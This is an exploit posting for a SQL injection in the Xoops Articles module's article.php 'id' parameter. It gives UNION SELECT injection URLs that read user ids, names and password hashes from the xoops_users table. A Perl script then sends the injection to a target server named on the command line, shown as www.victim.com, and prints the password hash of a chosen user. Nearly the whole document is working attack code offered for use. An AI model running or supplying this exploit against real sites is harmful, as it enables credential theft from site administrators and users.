Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

[crazy_kinq]

/[EMAIL PROTECTED] / http://coderx.org


Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it


Sql 1-2


article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*


article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*


# Exploit :


#############################################

#Coded By [EMAIL PROTECTED]      http://coderx.org]#

#############################################


use IO::Socket;


if (@ARGV != 3)

{

    print "\n-----------------------------------\n";

    print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection 
ExpL0it\n";

    print "-----------------------------------\n";

    print "\n4ever Cra\n";

    print "crazy_kinq[at]hotmail.co.uk\n";

    print "http://coderx.org\n";;

    print "\n-----------------------------------\n";

    print "\nKullanim: $0 <server> <path> <uid>\n";

    print "Ornek: $0 www.victim.com /path 1\n";

    print "\n-----------------------------------\n";

    exit ();

}


$server = $ARGV[0];

$path = $ARGV[1];

$uid = $ARGV[2];


$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  
PeerPort =>

"80");

printf $socket ("GET

%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/*
 HTTP/1.0\nHost: %s\nAccept: */*\nConnection:

close\n\n",

$path,$server,$uid);


while(<$socket>)


{

    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }

}


# [EMAIL PROTECTED]

# http://coderx.org

# [EMAIL PROTECTED]